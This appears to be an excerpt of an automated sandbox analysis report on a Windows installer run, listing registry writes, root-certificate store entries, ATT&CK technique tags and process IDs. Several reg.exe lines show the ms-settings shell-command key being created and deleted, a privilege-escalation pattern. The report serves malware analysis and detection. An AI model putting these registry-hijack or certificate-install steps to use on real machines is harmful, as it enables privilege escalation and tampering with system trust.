Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.DDF\shell\open\ = "&Open"	safman_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}	installer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	safman.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.DUMP\shell\open\ = "&Open"	safman_setup.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.DDF\ = "SAF Data Digital File"	safman_setup.tmp
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 78003100000000005759f6711100557365727300640009000400efbec5522d607b590f942e0000006c0500000000010000000000000000003a00000000004a924b0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	safman.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.DDF\shell	safman_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	7zFM.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0 = 50003100000000007b598b95100041646d696e003c0009000400efbe5759f6717b598b952e00000033570200000001000000000000000000000000000000dca0d300410064006d0069006e00000014000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\SAF.Document.DUMP\shell\open\command	safman_setup.tmp
Key deleted	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000200000001000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32	installer.exe
Key created	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	explorer.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	saBSI.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	saBSI.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	saBSI.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	saBSI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	ServiceHost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	ServiceHost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	ServiceHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8	saBSI.exe

Runs net.exe

Runs ping.exe 1 TTPs 17 IoCs

Remote System Discovery

T1018

pid	Process
21328	Process not Found
22996	Process not Found
250712	Process not Found
253972	Process not Found
22056	Process not Found
11724	Process not Found
20556	Process not Found
12496	Process not Found
22092	Process not Found
22548	Process not Found
271280	Process not Found
11452	Process not Found
